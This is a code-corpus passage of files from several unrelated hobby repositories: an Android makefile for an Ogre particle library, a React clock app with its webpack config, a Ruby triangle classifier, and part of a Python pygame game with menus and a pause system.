src/ParticleAffectors/ParticleUniverseScaleAffector.cpp \
src/ParticleAffectors/ParticleUniverseScaleAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseScaleVelocityAffector.cpp \
src/ParticleAffectors/ParticleUniverseScaleVelocityAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseSineForceAffector.cpp \
src/ParticleAffectors/ParticleUniverseSineForceAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseSphereCollider.cpp \
src/ParticleAffectors/ParticleUniverseSphereColliderTokens.cpp \
src/ParticleAffectors/ParticleUniverseTextureAnimator.cpp \
src/ParticleAffectors/ParticleUniverseTextureAnimatorTokens.cpp \
src/ParticleAffectors/ParticleUniverseTextureRotator.cpp \
src/ParticleAffectors/ParticleUniverseTextureRotatorTokens.cpp \
src/ParticleAffectors/ParticleUniverseVelocityMatchingAffector.cpp \
src/ParticleAffectors/ParticleUniverseVelocityMatchingAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseVortexAffector.cpp \
src/ParticleAffectors/ParticleUniverseVortexAffectorTokens.cpp \
src/ParticleObservers/ParticleUniverseOnClearObserver.cpp \
src/ParticleObservers/ParticleUniverseOnClearObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnCollisionObserver.cpp \
src/ParticleObservers/ParticleUniverseOnCollisionObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnCountObserver.cpp \
src/ParticleObservers/ParticleUniverseOnCountObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnEmissionObserver.cpp \
src/ParticleObservers/ParticleUniverseOnEmissionObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnEventFlagObserver.cpp \
src/ParticleObservers/ParticleUniverseOnEventFlagObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnExpireObserver.cpp \
src/ParticleObservers/ParticleUniverseOnExpireObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnPositionObserver.cpp \
src/ParticleObservers/ParticleUniverseOnPositionObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnQuotaObserver.cpp \
src/ParticleObservers/ParticleUniverseOnQuotaObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnRandomObserver.cpp \
src/ParticleObservers/ParticleUniverseOnRandomObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnTimeObserver.cpp \
src/ParticleObservers/ParticleUniverseOnTimeObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnVelocityObserver.cpp \
src/ParticleObservers/ParticleUniverseOnVelocityObserverTokens.cpp \
src/ParticleEventHandlers/ParticleUniverseDoAffectorEventHandler.cpp \
src/ParticleEventHandlers/ParticleUniverseDoAffectorEventHandlerTokens.cpp \
src/ParticleEventHandlers/ParticleUniverseDoEnableComponentEventHandler.cpp \
src/ParticleEventHandlers/ParticleUniverseDoEnableComponentEventHandlerTokens.cpp \
src/ParticleEventHandlers/ParticleUniverseDoExpireEventHandler.cpp \
src/ParticleEventHandlers/ParticleUniverseDoExpireEventHandlerTokens.cpp \
src/ParticleEventHandlers/ParticleUniverseDoFreezeEventHandler.cpp \
src/ParticleEventHandlers/ParticleUniverseDoFreezeEventHandlerTokens.cpp \
src/ParticleEventHandlers/ParticleUniverseDoPlacementParticleEventHandler.cpp \
src/ParticleEventHandlers/ParticleUniverseDoPlacementParticleEventHandlerTokens.cpp \
src/ParticleEventHandlers/ParticleUniverseDoScaleEventHandler.cpp \
src/ParticleEventHandlers/ParticleUniverseDoScaleEventHandlerTokens.cpp \
src/ParticleEventHandlers/ParticleUniverseDoStopSystemEventHandler.cpp \
src/ParticleEventHandlers/ParticleUniverseDoStopSystemEventHandlerTokens.cpp \
src/Externs/ParticleUniverseBoxColliderExtern.cpp \
src/Externs/ParticleUniverseBoxColliderExternTokens.cpp \
src/Externs/ParticleUniverseGravityExtern.cpp \
src/Externs/ParticleUniverseGravityExternTokens.cpp \
src/Externs/ParticleUniversePhysXActorExtern.cpp \
src/Externs/ParticleUniversePhysXActorExternTokens.cpp \
src/Externs/ParticleUniversePhysXBridge.cpp \
src/Externs/ParticleUniversePhysXFluidExtern.cpp \
src/Externs/ParticleUniversePhysXFluidExternTokens.cpp \
src/Externs/ParticleUniverseSceneDecoratorExtern.cpp \
src/Externs/ParticleUniverseSceneDecoratorExternTokens.cpp \
src/Externs/ParticleUniverseSphereColliderExtern.cpp \
src/Externs/ParticleUniverseSphereColliderExternTokens.cpp \
src/Externs/ParticleUniverseVortexExtern.cpp \
src/Externs/ParticleUniverseVortexExternTokens.cpp \
src/ParticleBehaviours/ParticleUniverseSlaveBehaviour.cpp \
src/ParticleBehaviours/ParticleUniverseSlaveBehaviourTokens.cpp
LOCAL_EXPORT_C_INCLUDES :=
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/include
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/../include
LOCAL_C_INCLUDES := $(LOCAL_PATH)/../include
LOCAL_C_INCLUDES += $(LOCAL_OGRE_PARTICLE_UNIVERSE_INCLUDE)
LOCAL_SRC_FILES :=
LOCAL_SRC_FILES += $(LOCAL_OGRE_PARTICLE_UNIVERSE_SRC_FILES)
LOCAL_WHOLE_STATIC_LIBRARIES := ogremain_static
include $(BUILD_STATIC_LIBRARY)
$(call import-module,../third_party/ogre/ogre_main) | ef44073c4a2d3f1ed4330da5df8400521cd41afc | [
"Markdown",
"CMake",
"Makefile",
"C++"
] | 37 | C++ | zhaoxiaofeng44/cocos2d-x-ogre | 6bf86a65a3e133ccc61b1851b8e329f00ed06ae5 | 41c426becf040e28023adede544f88b88a8c9529 |
refs/heads/master | <repo_name>djma777/zztrtr<file_sep>/src/components/Time.js
import React, { Component } from 'react'
class Time extends Component {
constructor(){
super();
this.state = {
time: new Date(),
}
this.runTime = this.runTime.bind(this)
}
runTime(){
this.setState({
time: new Date()
})
}
componentWillMount(){
console.log('will mount')
}
componentDidMount(){
console.log('did mount')
this.tick = setInterval(this.runTime, 1000)
}
componentWillUnmount(){
console.log('will unmount')
clearInterval(this.tick);
}
render(){
console.log('render')
return (
<section>
<h1>It is
<br/>
<time>{this.state.time.toLocaleTimeString()}</time>
</h1>
</section>
)
}
}
export default Time
<file_sep>/src/components/App.js
import React, { Component } from 'react';
import { render } from 'react-dom';
import Time from './Time'
class App extends Component {
render(){
return (
<header className="text-center">
<Hello />
<Time />
</header>
)
}
}
const Hello = () => (
<h1>Hello Universe!!!</h1>
)
export default App
<file_sep>/webpack.config.js
const { resolve } = require('path')
const HtmlWebpackPlugin = require('html-webpack-plugin')
const HtmlWebpackPluginConfig = new HtmlWebpackPlugin({
template: resolve(__dirname, 'src/index.html'),
filename: 'index.html',
inject: 'body'
})
const webpack = require('webpack')
const ExtractTextPlugin = require('extract-text-webpack-plugin')
const ExtractSass = new ExtractTextPlugin({
filename: '[name].[contenthash].css',
// disable: process.env.NODE_ENV === 'development'
})
module.exports = (env = {}) => {
const isProduction = env.production === true
return {
entry: isProduction
? ['./src/index.js']
: [
'webpack-dev-server/client?http://localhost:2000',
'webpack/hot/only-dev-server',
'./src/index.js'
],
output: {
path: resolve(__dirname, 'dist'),
filename: '[name].bundle.js'
},
module: {
rules: [
{
test: /\.jsx?$/,
use: [
'babel-loader'
],
exclude: /node_modules/
},
{
test: /\.scss?$/,
use: ExtractSass.extract({
use:[
{
loader: 'css-loader'
},
{
loader: 'postcss-loader',
},
{
loader: 'sass-loader'
}
],
fallback: 'style-loader'
}),
exclude: /node_modules/
},
{
test: /\.(png|jpg|gif)$/,
loader: 'url-loader',
options: {
limit: '10000',
name: 'images/[hash:12].[ext]'
},
exclude: /node_modules/
}
]
},
devServer: {
hot: true,
contentBase: resolve(__dirname, 'dist'),
port: 2000,
open: true,
stats: {
colors: true
}
},
plugins: isProduction
? [
HtmlWebpackPluginConfig,
new webpack.optimize.UglifyJsPlugin(),
new webpack.DefinePlugin({
PRODUCTION: JSON.stringify(true)
}),
ExtractSass
]
: [
HtmlWebpackPluginConfig,
new webpack.optimize.UglifyJsPlugin(),
new webpack.HotModuleReplacementPlugin(),
new webpack.NamedModulesPlugin(),
new webpack.DefinePlugin({
DEVELOPMENT: JSON.stringify(true)
}),
ExtractSass
],
devtool: isProduction
? 'cheap-module-source-map'
: 'source-map'
}
}
<file_sep>/src/index.js
import React from 'react'
import { render } from 'react-dom'
import App from './components/App'
require('./sass/main.scss')
render(
<App />,
document.getElementById('root')
)
if(module.hot) {
module.hot.accept()
}
| 6bc437ac365397d7b6a0b6cd0403b3b641680add | [
"JavaScript"
] | 4 | JavaScript | djma777/zztrtr | a6b50afdc4577dffc9321abd74e66163db3eaa9c | 37ef57a7897c0478424a2b8ca246484e1a517b5a |
refs/heads/master | <repo_name>SaraSpink/capybara_triangle<file_sep>/spec/triangles_spec.rb
require('rspec')
require('triangles')
describe("#is_triangle") do
it("Identifies equilateral triangle") do
check = Triangle.new(3, 3, 3)
expect(check.is_triangle).to eq("equilateral")
end
it("Identifies isoceles triangle") do
check = Triangle.new(3, 3, 5)
expect(check.is_triangle).to eq("isoceles")
end
it("Identifies equilateral triangle") do
check = Triangle.new(3, 4, 5)
expect(check.is_triangle).to eq("scalene")
end
it("Identifies equilateral triangle") do
check = Triangle.new(3, 2, 6)
expect(check.is_triangle).to eq("not a triangle")
end
end
<file_sep>/lib/triangles.rb
class Triangle
def initialize(side1, side2, side3)
@side1 = side1
@side2 = side2
@side3 = side3
@type = nil
end
def is_triangle
if @side1 + @side2 <= @side3 || @side2 + @side3 <= @side1 || @side3 + @side1 <= @side2
@type = "not a triangle"
elsif @side1 == @side2 && @side2 == @side3 && @side3 == @side1
@type = "equilateral"
elsif @side1 == @side2 || @side2 == @side3 || @side3 == @side1
@type = "isoceles"
elsif @side1 != @side2 && @side2 != @side3 && @side3 != @side1
@type = "scalene"
end
end
end
<file_sep>/app.rb
require('sinatra')
require('sinatra/reloader')
also_reload('lib/**/*.rb')
require('./lib/triangles')
require('pry')
get ('/') do
erb(:input)
end
post ('/output') do
side1 = params.fetch("side1").to_i
side2 = params.fetch("side2").to_i
side3 = params.fetch("side3").to_i
triangle = Triangle.new(side1, side2, side3)
@triangle_out = triangle.is_triangle
erb(:output)
end
| d9cdcc2b8c583fd28bba93cb1fe03891d838d925 | [
"Ruby"
] | 3 | Ruby | SaraSpink/capybara_triangle | f7fff34221f2c2047bb3b0061ebb99943e98adac | a4dc46bf763d08760dddca72cdbafbdc19891172 |
refs/heads/stable/6.0 | <repo_name>Permyak-Logy/Underground-of-Knights<file_sep>/README.md
# PyGameProject
Проект по библиотеке PyGame
<file_sep>/run.py
import pygame
import os
import sys
from win32api import GetSystemMetrics
from random import choice
from random import randint
from math import sin, cos, atan, copysign
# Флаги режимов MODE_MENU, MODE_GAME, MODE_SETTINGS
MODE_MENU, MODE_GAME = 0, 1
DEBUG_INFO = True # Флаг доп. информации в консоли
class GameExample:
'''
Главный класс игры
'''
def __init__(self):
'''Инициализация'''
print('init Game') if DEBUG_INFO else None
pygame.init()
# Загрузка данных настроек
self.data_settings = self.load_settings()
# Создание переменной с функцианалом для музыки
self.music = pygame.mixer.music
# Установка громкости музыки
self.music.set_volume(float(self.data_settings['volume']))
# Инициализация разрешения окна
self.size = self.width, self.height = tuple(map(int, self.data_settings['matrix'].split('x')))
# Центрирование окна
self.center()
# Инициализация режима экрана и главного кадра игры
self.set_mode_display(self.size, self.data_settings['fullscreen'] == 'true')
# Загрузка меню
self.load_menu()
# Загруска игрового пространства
self.load_game_space()
# Установка титульного имени окна
pygame.display.set_caption('Underground of Knights')
# Установка иконки
pygame.display.set_icon(self.load_image('icon.png'))
# Скрытие курсора
pygame.mouse.set_visible(False)
# Некоторые переменныне в игре
self.mode = None # Режим окна
self.image_arrow = pygame.transform.scale(self.load_image('arrow.png', -1), (22, 22)) # Картинка курсора
def mainloop(self):
''' Главный цикл программы '''
print('\n-----Game started------') if DEBUG_INFO else None
self.start_screen_opening() # Начало загрузочного экрана
self.open_menu() # Открытие меню
while True:
# Проверка событий
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.terminate()
if event.type == pygame.MOUSEBUTTONDOWN:
self.mouse_press_event(event)
if event.type == pygame.KEYDOWN:
self.key_press_event(event)
# Отрисовка экрана
self.main_screen.fill(pygame.Color('black'))
if self.mode == MODE_MENU:
# Обмновление меню
self.menu.update()
# Рисование меню
self.menu.render(self.main_screen)
if self.mode == MODE_GAME:
# Обновление игрового пространства
self.game_space.update()
# Рисование ирового пространства
self.game_space.render(self.main_screen)
if pygame.mouse.get_focused():
# Отрисовка курсора
self.main_screen.blit(self.image_arrow, (pygame.mouse.get_pos()))
self.main_screen.blit(pygame.font.Font(None, 20).render(
f'''fps: {(round(self.game_space.clock.get_fps()) if self.mode == MODE_GAME else
round(self.menu.clock.get_fps()))}''', 0,
(255, 255, 255)), (0, 0)) # Отображение FPS в игре
# Обновление дисплея
pygame.display.flip()
def center(self):
"""Центрирование окна""" # Работает только если вызвать до инициализации pygame.display
pos_x = GetSystemMetrics(0) / 2 - self.width / 2
pos_y = GetSystemMetrics(1) / 2 - self.height / 2
os.environ['SDL_VIDEO_WINDOW_POS'] = '%i,%i' % (int(pos_x), int(pos_y))
os.environ['SDL_VIDEO_CENTERED'] = '0'
@staticmethod
def load_settings() -> dict:
"""Загрузка настроек из файла data\settings data"""
result = {}
with open('data\settings data', encoding='utf8') as file:
data = file.readlines()
for elem in data:
key, val = elem.split()
result[key] = val
return result
@staticmethod
def load_image(name, colorkey=None) -> pygame.Surface:
'''
Возвращает картинку с именем name. Если есть colorkey, то у картинки делается фон прозрачным.
Если colorkey == -1 то берётся цвет из самого верхнего угла картинки, иначе ...
'''
fullname = os.path.join('data\images', name)
image = pygame.image.load(fullname).convert()
if colorkey is not None:
if colorkey == -1:
colorkey = image.get_at((0, 0))
image.set_colorkey(colorkey)
else:
image = image.convert_alpha()
return image
def load_menu(self):
'''Загруска меню'''
print('\tinit menu:\n') if DEBUG_INFO else None
# Сокращение некоторых функций
_Font = pygame.font.Font
_SysFont = pygame.font.SysFont
_Color = pygame.Color
# Создание меню
self.menu = Menu(self)
# fonts = ['consolas', 'cuprum', 'gabriola', ''] # Красивые шрифты
# Пункты меню
self.menu = Menu(self) # Создание меню
# Надпись названия игры
label_title = Punkt(text='Underground of Knights', pos=(int(self.width * 0.4), int(self.height * 0.15)),
size=-1, show_background=False, color_text=_Color('white'), number=0,
font=_SysFont('gabriola', self.height // 10), bolden=False)
# Кнопка "Играть"
btn_play = Punkt(text='Играть', pos=(int(self.width * 0.05), int(self.height * 0.8)), size=-1,
show_background=False, color_text=_Color('green'), number=1,
font=_SysFont('gabriola', self.height // 20), func=self.start_game)
# Кнопка "Руководство"
btn_guide = Punkt(text='Руководство', pos=(int(self.width * 0.55), int(self.height * 0.8)), size=-1,
show_background=False, color_text=_Color('white'), number=2,
font=_SysFont('gabriola', self.height // 20), func=self.open_guide)
# Кнопка "Выход"
btn_exit = Punkt(text='Выйти', pos=(int(self.width * 0.8), int(self.height * 0.8)), size=-1,
show_background=False, color_text=_Color('red'), number=3,
font=_SysFont('gabriola', self.height // 20), func=self.terminate)
# Анимация мерцания света
animate_light = AnimatedPunkt.Blinking(int(self.width * 0.5), int(self.height * 0.345),
(int(self.height * 0.45), int(self.height * 0.45)),
self.menu.animated_punkts_group)
# Анимированный свет фонаря
pygame.draw.circle(animate_light.image, _Color("yellow"),
(animate_light.rect.width // 2, animate_light.rect.height // 2),
animate_light.rect.width // 2)
animate_light.image.set_colorkey(animate_light.image.get_at((0, 0)))
# Текст руководства
self.text_guide = """\n\n
\bУправление\b \n\n\n
\bW\b - Движение вперёд \n
\bS\b - Движение назад \n
\bA\b - Движение вправо \n
\bD\b - Движение влево \n
\bZ\b - Выбросить броню \n
\bQ\b - Смена оружия \n
\bEsc\b - Выход в меню \n
\bP\b - Пауза \n
\bE\b - Вход в портал \n
"""
# Невидимая кнопка закрытия руководства
btn_close_guid = Punkt(pos=(0, 0), size=self.size, show_background=False, number=4, func=self.close_guide)
btn_close_guid.hide()
list_lines_guid = [] # Список всех пунктов которые позволят отобразить весь текст руководства
for i, elem in enumerate(self.text_guide.split("\n")):
# Строчка
line = Punkt(text=elem, pos=(0, i * int(self.height * 0.04)), size=-1, show_background=False, bolden=False,
color_text=_Color("white"), number=i + 5, font=_Font(None, int(self.height * 0.05)))
line.hide()
list_lines_guid.append(line)
# Добавление пунктов в меню
self.menu.add_punkts(label_title, btn_play, btn_guide, btn_exit,
btn_close_guid, *list_lines_guid) # Добавление пунктов
def load_game_space(self):
'''Загрузка ирового пространства'''
print('\tinit game space:\n') if DEBUG_INFO else None
# Сокращение некоторых функций
_Font = pygame.font.Font
_SysFont = pygame.font.SysFont
_Color = pygame.Color
# Создание игрового пространства
self.game_space = GameSpace(self)
# Кнопка "Exit"
btn_exit = Punkt(text='Выход', pos=(int(self.width * 0.01), int(self.height * 0.01)), size=-1,
show_background=False, color_text=_Color('yellow'), number=5,
font=_SysFont('gabriola', self.height // 20), func=self.open_menu)
# Кнопка "Pause"
btn_pause = Punkt(text="Пауза", pos=(int(self.width * 0.01), int(self.height * 0.07)), size=-1,
show_background=False, color_text=_Color('yellow'), number=6,
font=_SysFont('gabriola', self.height // 20), func=self.set_pause)
# Изображение "PAUSE"
label_pause = Punkt(text='ПАУЗА', pos=(int(self.width * 0.2), int(self.height * 0.4)), size=-1,
show_background=False, color_text=_Color('blue'), number=7, bolden=False,
font=_SysFont(None, self.height // 2))
label_pause.hide()
# Размеры Punkt у элементов отображения текущего и вторичного оружия
size = tuple([int(self.height * 0.14)] * 2)
# Изображение текущего оружия
label_cur_weapon = Punkt(text='None', pos=(int(self.width * 0.05), int(self.height * 0.6)),
size=size, show_background=False, color_text=_Color("white"),
number=8) # func=self.game_space.player.change_weapons # Привязывается после new_game
# Изображение второго оружия
label_second_weapon = Punkt(text='None 2', pos=(int(self.width * 0.05), int(self.height * 0.75)),
size=size, show_background=False, color_text=_Color("white"),
number=9) # func=self.game_space.player.change_weapons
# Размеры полосок здоровья и щитов
size = (int(self.width * 0.2), int(self.height * 0.05))
# Полоска здоровья
label_health = Punkt(text='Здоровье: 000', pos=(int(self.width * 0.78), int(self.height * 0.8)), size=size,
font=_SysFont('gabriola', int(self.height * 0.05)), bolden=False,
color_text=_Color('white'), color=(60, 60, 60),
show_background=False, number=10)
# Полоска щитов
label_shields = Punkt(text='Щиты: 000', pos=(int(self.width * 0.78), int(self.height * 0.8) + size[1]),
size=size, font=_SysFont('gabriola', int(self.height * 0.05)), bolden=False,
color_text=_Color('white'), color=(60, 60, 60),
show_background=False, number=11)
# Полоска энергии
label_energy = Punkt(text='Энергия: 000', pos=(int(self.width * 0.78), int(self.height * 0.8) + size[1] * 2),
size=(size[0], size[1] // 2), color=(60, 60, 60), color_text=_Color('black'),
show_background=False, number=12, bolden=False)
# Показатель брони
label_armor = Punkt(text='Броня: 00000', pos=(int(self.width * 0.85), int(self.width * 0.05)), size=-1,
font=_SysFont('gabriola', int(self.height * 0.05)), bolden=False, show_background=False,
number=13, color_text=_Color('white'))
# Показатель скорости бега
label_sprint_speed = Punkt(text='Скорость: 0000', font=_SysFont('gabriola', int(self.height * 0.05)), size=-1,
pos=(int(self.width * 0.85), int(self.width * 0.05 + label_armor.get_size()[1])),
bolden=False, show_background=False, number=14, color_text=_Color('white'))
# Показатель текущего уровня карты
label_number_level = Punkt(text='Уровень 000', font=_SysFont('gabriola', int(self.height * 0.05)), size=-1,
pos=(int(self.width * 0.4), int(self.width * 0.05)), bolden=False,
show_background=False, number=15, color_text=_Color('white'))
label_number_level.number_level = 0
# Надпись сообщения которое появится по окончании игры
label_message = Punkt(text='None', font=_SysFont('gabriola', int(self.height * 0.4)),
pos=(0, 0), bolden=False, size=self.size, show_background=False, number=16,
color_text=_Color('white'), func=self.open_menu)
# Добавление пунктов в игровое пространство
self.game_space.add_punkts(btn_exit, btn_pause, label_pause, label_cur_weapon,
label_armor, label_energy, label_sprint_speed,
label_second_weapon, label_health, label_shields,
label_number_level, label_message) # Добавление пунктов
def mouse_press_event(self, event):
'''События мыши'''
print(f'{self.__class__}.mouse_press_event()') if DEBUG_INFO else None
if self.mode == MODE_MENU:
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
# Проверяет элементы после нажатия мышкой кнопкой "1"
self.menu.check_on_press_punkts(event.pos)
elif self.mode == MODE_GAME:
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
# Проверяет элементы после нажатия мышкой кнопкой "1"
if self.game_space.check_on_press_punkts(event.pos):
# Проверка на нажатие punkt
pass
elif self.game_space.pause_status:
# Если пауза то убрать её и больше ничего не делать
self.unset_pause()
elif self.game_space.player.take_thing(event.pos):
# Проверка на поднятие вещи в позиции event.pos
pass
else:
# Начать атаку позиции event.pos
self.game_space.player.attack(event.pos)
def key_press_event(self, event):
'''События клавиатуры'''
print(f'{self.__class__}.key_press_event()') if DEBUG_INFO else None
if self.mode == MODE_GAME:
if event.key == pygame.K_p:
# Установка и убирание паузы при нажатии клавиши P
if self.game_space.pause_status:
self.unset_pause()
else:
self.set_pause()
elif event.key == pygame.K_ESCAPE:
# Открытие меню при нажатии на Escape
self.open_menu()
elif event.key == pygame.K_q:
# Смена оружия при нажатии на Q
self.game_space.player.change_weapons()
elif event.key == pygame.K_z:
# Сброс брони при нажатии на Z
old_thing = self.game_space.player.things.get("armor")
if old_thing is not None:
self.game_space.player.things["armor"] = None
old_thing.put(self.game_space.player.rect.x, self.game_space.player.rect.y)
elif event.key == pygame.K_e:
# Заход в портал при нажатии на E
if not pygame.sprite.groupcollide(self.game_space.player_group,
self.game_space.transitional_portal_group,
False, False):
return # Для использования нужно быть рядом с порталом
if self.game_space.enemies_group.sprites():
return # Должны быть убиты все враги
self.game_space.generate_level(self.game_space.get_next_level())
def start_game(self):
'''Начать игру'''
print('GameExample.start_game()') if DEBUG_INFO else None
self.mode = MODE_GAME # Установка режима MODE_GAME
self.game_space.new_game() # Начало новой игры в game_space
self.unset_pause() # Убирание паузы
self.music.pause() # Остановка музыки
self.game_space.clock.tick() # Сброс времени с последнего тика
def open_menu(self):
'''Открывает меню'''
print('GameExample.open_menu()') if DEBUG_INFO else None
self.mode = MODE_MENU # Установка режима MODE_MENU
self.set_pause() # Установка паузы
# Загрузка музыки
self.music.load('data\music\main_menu.mp3')
self.music.play(-1)
self.menu.clock.tick() # Сброс времени с последнего тика
def open_guide(self):
'''Открывает руководство'''
print(f'{self.__class__}.open_guide()') if DEBUG_INFO else None
n = len(self.text_guide.split("\n")) # Количество строчек в тексте
[self.menu.get_punkt(i).hide() for i in range(4)] # Сокрытие пунктов меню
[self.menu.get_punkt(i).show() for i in range(4, 5 + n)] # Показ пунктов руководства
def close_guide(self):
'''Закрывает руководство'''
n = len(self.text_guide.split("\n")) # Количество строчек в тексте
[self.menu.get_punkt(i).show() for i in range(4)] # Показ пунктов меню
[self.menu.get_punkt(i).hide() for i in range(4, 5 + n)] # Сокрытие пунктов руководства
def set_mode_display(self, size, bool_full_screen):
'''Устанавливает полноэкранный и неполноэкранный режим'''
if bool_full_screen:
self.main_screen = pygame.display.set_mode(size,
pygame.HWSURFACE |
pygame.DOUBLEBUF |
pygame.FULLSCREEN)
else:
self.main_screen = pygame.display.set_mode(size)
def set_pause(self):
'''Устанавливает паузу в GameSpace'''
print(f'{self.__class__}.set_pause()') if DEBUG_INFO else None
self.game_space.pause_status = True # Установка паузы
# Сокрытие пунктов выход и пауза
self.game_space.get_punkt(5).hide()
self.game_space.get_punkt(6).hide()
# Показ надписи паузы
self.game_space.get_punkt(7).show()
def unset_pause(self):
'''Убирает паузу в GameSpace'''
print(f'{self.__class__}.unset_pause()') if DEBUG_INFO else None
self.game_space.pause_status = False # Деустановка паузы
# Показ пунктов выход и пауза
self.game_space.get_punkt(5).show()
self.game_space.get_punkt(6).show()
# Скрытие надписи паузы
self.game_space.get_punkt(7).hide()
def start_screen_opening(self):
'''Зашрузочная заставка'''
print(f'{self.__class__}.start_screen_opening()') if DEBUG_INFO else None
# Логотип PyPLy
logo_PyPLy = self.load_image('PyPLy.png', colorkey=-1)
logo_PyPLy = pygame.transform.scale(logo_PyPLy,
(int(logo_PyPLy.get_width() * (self.width // 640) * 0.5),
int(logo_PyPLy.get_height() * (self.height // 360) * 0.5)))
# Логотип DeusVult
logo_DeusVult = self.load_image('DeusVult.png', colorkey=-1)
logo_DeusVult = pygame.transform.scale(logo_DeusVult,
(int(logo_DeusVult.get_width() * (self.width // 640) * 0.5),
int(logo_DeusVult.get_height() * (self.height // 360) * 0.5)))
# Логотип PyGame
logo_PyGame = self.load_image('PyGame.png', colorkey=-1)
logo_PyGame = pygame.transform.scale(logo_PyGame,
(int(logo_PyGame.get_width() * (self.width // 640) * 0.27),
int(logo_PyGame.get_height() * (self.height // 360) * 0.27)))
clock = pygame.time.Clock() # Часы для точного показа анимации
for image in [logo_PyPLy, logo_DeusVult, logo_PyGame]:
alpha = 0 # Начальный показатель alpha канала
manifestation_rate = 100 # Скорость проявления исзображения в %/сек
continuation_time = 1 # Сколько времени осталось показывать изображение после его полного отображения
fade_rate = 400 # Скорость угасния исзображения в %/сек
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.terminate()
if event.type == pygame.MOUSEBUTTONDOWN:
running = False
if event.type == pygame.KEYDOWN:
running = False
tick = clock.tick() # Получение времени с предыдущего tick
if alpha < 200 and continuation_time > 0:
# Проявление image в самом начале путём увеличения alpha канала
alpha += manifestation_rate * 2 * tick / 1000
elif continuation_time > 0:
# Отсчёт оставшегося времени показа
continuation_time -= tick / 1000
elif alpha >= 0 and continuation_time <= 0:
# Скрытие изображения путём уменьшения alpha канала
alpha -= fade_rate * 2 * tick / 1000
else:
# Как только анимация заканчивается перейти к следующиему изображению
running = False
# Заливка главного кадра
self.main_screen.fill(pygame.color.Color('black'))
image.set_alpha(alpha) # Установка alpha канала
# Наложение изображения на главный кадр
self.main_screen.blit(image, (self.width // 2 - image.get_width() // 2,
self.height // 2 - image.get_height() // 2))
pygame.display.flip()
@staticmethod
def terminate():
'''Выход из игры, и завершение главного цикла'''
print('terminate()') if DEBUG_INFO else None
pygame.quit()
print('-----Game closed-----') if DEBUG_INFO else None
sys.exit()
class Menu:
'''
Меню игры
'''
def __init__(self, game, punkts=None):
"""Инициализация"""
self.game = game # Подключение игры
background = self.game.load_image('background menu.png') # Загрузка картинки фона
self.image_background = pygame.transform.scale(background, self.game.size) # Преобразование фона
self.punkts = punkts if punkts is not None else list() # Занесение пунктов
self.animated_punkts_group = pygame.sprite.Group()
self.clock = pygame.time.Clock()
def update(self):
"""Обновение меню"""
tick = self.clock.tick()
self.animated_punkts_group.update(tick)
def render(self, screen):
'''Рисует меню'''
screen.blit(self.image_background, (0, 0)) # Накладывет фон
for punkt in self.punkts:
# Рисует все пункты меню
punkt.draw(screen, ispressed=punkt.get_focused(pygame.mouse.get_pos()))
self.animated_punkts_group.draw(screen)
def add_punkt(self, punkt):
'''Добавление 1 пункта'''
self.punkts.append(punkt)
def add_punkts(self, *punkts):
'''Добавление нескольких пунктов'''
self.punkts += list(punkts)
def get_punkt(self, number):
'''Возвращает пункт по заданному номеру'''
for punkt in self.punkts:
if punkt.number == number:
return punkt
def check_on_press_punkts(self, pos):
'''Проверяет пункты на нажатие''' # Не могу придумать...
for punckt in self.punkts:
if punckt.on_click(pos):
return True
return False
class GameSpace:
'''
Игровое пространство
'''
def __init__(self, game, punkts=None):
self.game = game # Подключение игры
self.punkts = punkts if punkts is not None else list() # Занесение пунктов
self.levels = [] # Список уровней
self.pause_status = False # Статус паузы
self.size_cell = int(self.game.height * 0.2) # Размер клетки
self.is_finished = False # Статус законченности игры
self.all_sprites = pygame.sprite.Group() # Все спрайты
self.player_group = pygame.sprite.Group() # Спрайт игрока
self.enemies_group = pygame.sprite.Group() # Спрайты врагов
self.walls_group = pygame.sprite.Group() # Спрайты стен
self.tiles_group = pygame.sprite.Group() # Спрайты земли
self.items_group = pygame.sprite.Group() # Спрайты вещей
self.transitional_portal_group = pygame.sprite.Group() # Спрайт выхода
self.bullets_group = pygame.sprite.Group() # Спрайты снарядов
self.player = None # Создание игрока
self.clock = pygame.time.Clock() # Создание игрового времени
self.camera = Camera(self) # Камера
def update(self):
'''Обновляет данные игры'''
tick = self.clock.tick() # Получения момента времени
if self.pause_status is True:
return
if self.is_finished is True:
return
self.all_sprites.update(tick) # Обновление объектов
self.update_interface() # Обновление интерфейса
# Обновление камеры
self.camera.update(self.player)
for sprite in self.all_sprites:
self.camera.apply(sprite)
def update_interface(self):
'''обновление боевого интерфейса'''
# Текущее оружие
cur_weapon_punkt = self.get_punkt(8)
cur_weapon = self.player.things['cur_weapon']
if cur_weapon is not None:
image_cur_weapon = pygame.Surface(size=cur_weapon_punkt.get_size())
pygame.draw.rect(image_cur_weapon, pygame.color.Color('green'), (0, 0, *cur_weapon_punkt.get_size()), 2)
image_cur_weapon.blit(pygame.transform.scale(
cur_weapon.icon_image, (image_cur_weapon.get_width(), image_cur_weapon.get_height())), (0, 0))
cur_weapon_punkt.set_image(image_cur_weapon)
cur_weapon_punkt.set_text(cur_weapon.weapon_name)
cur_weapon_punkt.show()
else:
cur_weapon_punkt.hide()
# Второе оружие
second_weapon_punkt = self.get_punkt(9)
second_weapon = self.player.things['second_weapon']
if second_weapon is not None:
image_second_weapon = pygame.Surface(size=second_weapon_punkt.get_size())
pygame.draw.rect(image_second_weapon, pygame.color.Color('gray'), (0, 0, *second_weapon_punkt.get_size()),
2)
image_second_weapon.blit(pygame.transform.scale(
